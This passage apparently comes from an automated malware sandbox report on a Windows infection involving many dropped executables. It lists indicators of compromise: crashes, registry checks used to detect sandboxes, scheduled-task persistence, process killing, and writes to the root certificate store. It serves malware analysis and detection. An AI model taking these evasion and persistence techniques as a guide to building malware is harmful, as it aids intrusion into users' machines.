modification C:\Windows\assembly\Desktop.ini IDownload.App.exe File opened for modification C:\Windows\Installer\33ea0.msi msiexec.exe File created C:\Windows\SystemTemp\~DF5530EE399C8091E0.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI900A.tmp msiexec.exe File opened for modification C:\Windows\assembly IDownload.App.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI7B34.tmp msiexec.exe File created C:\Windows\Installer\33ea0.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI5AF3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6DB5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6053.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI675A.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF440604B3DC83196F.TMP msiexec.exe File created C:\Windows\assembly\Desktop.ini IDownload.App.exe File opened for modification C:\Windows\Installer\MSI84DD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8DA8.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 31 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5976 5100 WerFault.exe Fri004dba7f4795.exe 5916 1652 WerFault.exe Fri007b1b030a1a32.exe 4552 5800 WerFault.exe setup.exe 1452 6040 WerFault.exe rundll32.exe 4612 6040 WerFault.exe rundll32.exe 2032 5944 WerFault.exe vvzQen9T8gn95mJC6pOP_HDo.exe 5252 5820 WerFault.exe 0AdgPZuLzdDXmeGBdZzAfKFP.exe 6112 4848 WerFault.exe xaiTGuks31gRBwJQPjqa0zco.exe 5524 5292 WerFault.exe LzmwAqmV.exe 6476 5796 WerFault.exe faix46uT7fe2coyITPJI_gRZ.exe 6920 6116 WerFault.exe 4765798.scr 6900 5756 WerFault.exe qSEyiynEt2usFH1F3ILQKqqn.exe 6796 4128 WerFault.exe sqINKvqX_Z4207Sj2ScquzD3.exe 6528 5920 WerFault.exe o3jVhWpzGcwB1rSJvh8Bh1Jy.exe 4456 4260 WerFault.exe Fri008493e5f0216a2ff.exe 880 6268 WerFault.exe 8199809.scr 6788 1252 WerFault.exe rodN7rVXJUbtdy2Ers_haaxl.exe 6844 5500 WerFault.exe 9h0juX45eflO0kUjSWERttjq.exe 4220 1724 WerFault.exe IdTIuEvxp8vtL3Y6tiyTVW50.exe 6644 3400 WerFault.exe rundll32.exe 4968 2236 WerFault.exe GcleanerEU.exe 3972 1796 WerFault.exe D905.exe 2264 4628 WerFault.exe rundll32.exe 3668 556 WerFault.exe gcleaner.exe 5348 5712 WerFault.exe F9CD.exe 7112 504 WerFault.exe 289.exe 7164 1692 WerFault.exe 15C3.exe 4988 4436 WerFault.exe E819.exe 2396 5276 WerFault.exe GcleanerEU.exe 1784 4472 WerFault.exe gcleaner.exe 3392 3912 WerFault.exe rundll32.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
X5evWPL7qD3xAYZGheHG_oYH.exe1CC5.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI X5evWPL7qD3xAYZGheHG_oYH.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI X5evWPL7qD3xAYZGheHG_oYH.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI X5evWPL7qD3xAYZGheHG_oYH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1CC5.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1CC5.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1CC5.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exewqER3NvWNOXWCYzBLNICJiQQ.exetimeout.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 wqER3NvWNOXWCYzBLNICJiQQ.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 timeout.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wqER3NvWNOXWCYzBLNICJiQQ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier timeout.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6836 schtasks.exe 5544 schtasks.exe 5024 schtasks.exe 6392 schtasks.exe 6124 schtasks.exe 6892 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5524 timeout.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exewqER3NvWNOXWCYzBLNICJiQQ.exeWerFault.exeWerFault.exeInstall.exemsedge.exeWerFault.exetimeout.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wqER3NvWNOXWCYzBLNICJiQQ.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS timeout.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU timeout.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wqER3NvWNOXWCYzBLNICJiQQ.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 6592 taskkill.exe 6132 taskkill.exe 6884 taskkill.exe 2896 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
sihclient.exesvchost.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe -
Modifies registry class 4 IoCs
Processes:
description ioc process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ -
Processes:
Fri00515c9ed9622f.exeinstaller.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B Fri00515c9ed9622f.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B\Blob = 5c0000000100000004000000000800000f00000001000000200000003560e45b41e46b8f36537025d1d5bc02d9652a10645b0eff69e8b6a52191f335090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b000000010000005200000047006f00200044006100640064007900200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790020001320200047003200000053000000010000002500000030233021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c062000000010000002000000045140b3247eb9cc8c5b4f0d7b53091f73292089e6e5a63e2749dd3aca9198eda1400000001000000140000003a9a8507106728b6eff6bd05416e20c194da0fde1d000000010000001000000070253fbcbde32a014d38c1993098ad9903000000010000001400000047beabc922eae80e78783462a79f45c254fde68b19000000010000001000000021d008b47b7a2a81c8435903ded424c92000000001000000c9030000308203c5308202ada003020102020100300d06092a864886f70d01010b0500308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bf716208f1fa5934f71bc918a3f7804958e9228313a6c52043013b84f1e685499f27eaf6841b4ea0b4db7098c73201b1053e074eeef4fa4f2f593022e7ab19566be28007fcf316758039517be5f935b6744ea98d8213e4b63fa90383faa2be8a156a7fde0bc3b6191405caeac3a804943b467c320df3006622c88d696d368c1118b7d3b21c60b438fa028cced3dd4607de0a3eeb5d7cc87cfbb02b53a4926269512505611a44818c2ca9439623dfac3a819a0e29c51ca9e95d1eb69e9e300a39cef18880fb4b5dcc32ec85624325340256270191b43b702a3f6eb1e89c88017d9fd4f9db536d609dbf2ce758abb85f46fccec41b033c09eb49315c6946b3e0470203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604143a9a8507106728b6eff6bd05416e20c194da0fde300d06092a864886f70d01010b0500038201010099db5d79d5f99759670361f17e3b0631752da1208e4f6587b4f7a69cbcd8e92fd0db5aeecf748c73b43842da057bf80275b8fda5b1d7aef6d7de13cb53107e8a46d197fab72e2b11ab90b02780f9e89f5ae9379fabe4df6cb385179d3dd9244f799135d65f04eb8083ab9a022db510f4d890c7047340ed7225a0a99fec9eab68129957c68f123a09a4bd44fd061537c19be432a3ed38e8d864f32c7e14fc02ea9fcdff076817db2290382d7a8dd154f169e35f33ca7a3d7b0ae3ca7f5f39e5e275bac5761833ce2cf02f4cadf7b1e7ce4fa8c49b4a5406c57f7dd5080fe21cfe7e17b8ac5ef6d416b243090c4df6a76bb4998465ca7a88e2e244be5cf7ea1cf5 Fri00515c9ed9622f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 